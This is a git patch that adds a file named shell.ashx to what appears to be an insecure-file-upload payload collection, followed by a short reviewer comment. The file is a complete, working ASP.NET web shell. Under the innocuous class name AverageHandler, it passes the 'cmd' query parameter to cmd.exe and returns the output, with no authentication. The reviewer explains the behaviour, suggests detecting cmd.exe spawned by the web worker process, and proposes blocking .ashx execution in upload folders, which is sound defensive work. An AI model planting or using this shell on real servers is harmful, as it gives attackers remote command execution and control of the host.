From 2c0fff2a7a6d1e5ea31ecdd84756032f939a3754 Mon Sep 17 00:00:00 2001
From: chivato <61525295+SecGus@users.noreply.github.com>
Date: Tue, 30 Mar 2021 13:56:31 +0100
Subject: [PATCH] Add .ashx shell
---
.../Extension ASP/shell.ashx | 42 +++++++++++++++++++
1 file changed, 42 insertions(+)
create mode 100644 Upload Insecure Files/Extension ASP/shell.ashx
diff --git a/Upload Insecure Files/Extension ASP/shell.ashx b/Upload Insecure Files/Extension ASP/shell.ashx
new file mode 100644
index 00000000..bfd3286d
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.ashx
@@ -0,0 +1,42 @@
+<% @ webhandler language="C#" class="AverageHandler" %>
+
+using System;
+using System.Web;
+using System.Diagnostics;
+using System.IO;
+
+public class AverageHandler : IHttpHandler
+{
+ /* .Net requires this to be implemented */
+ public bool IsReusable
+ {
+ get { return true; }
+ }
+
+ /* main executing code */
+ public void ProcessRequest(HttpContext ctx)
+ {
+ Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);
+ string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");
+
+ ctx.Response.Write("
Command:
");
+ ctx.Response.Write("
");
+ ctx.Response.Write("
");
+
+    /* command execution and output retrieval */
+    ProcessStartInfo psi = new ProcessStartInfo();
+    psi.FileName = "cmd.exe";
+    psi.Arguments = "/c "+command;
+    psi.RedirectStandardOutput = true;
+    psi.UseShellExecute = false;
+    Process p = Process.Start(psi);
+    StreamReader stmrdr = p.StandardOutput;
+    string s = stmrdr.ReadToEnd();
+    stmrdr.Close();
+
+    ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
+    ctx.Response.Write("
");
+ ctx.Response.Write("
");
+ ctx.Response.Write("By @Hypn, for educational purposes only.");
+ }
+}
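Review bot: The file never says what it is: the class is called `AverageHandler` and the comment `/* main executing code */` hides the one fact a reader needs, namely that the `cmd` query parameter is appended unchanged to `cmd.exe /c` (`psi.Arguments = "/c "+command;`) and that nothing visible in the hunk authenticates the caller. I would replace that comment with `/* upload-filter test artifact: runs the cmd query parameter through cmd.exe and writes its stdout to the response; no access control */` so the file is self-describing when it turns up on a host. For a defender reading this, the process start is the observable event: presumably `cmd.exe` shows up as a child of the web server's worker process, which is a reasonable thing to alert on. The control that makes the file inert is denying handler execution for `.ashx` in any directory that accepts uploads.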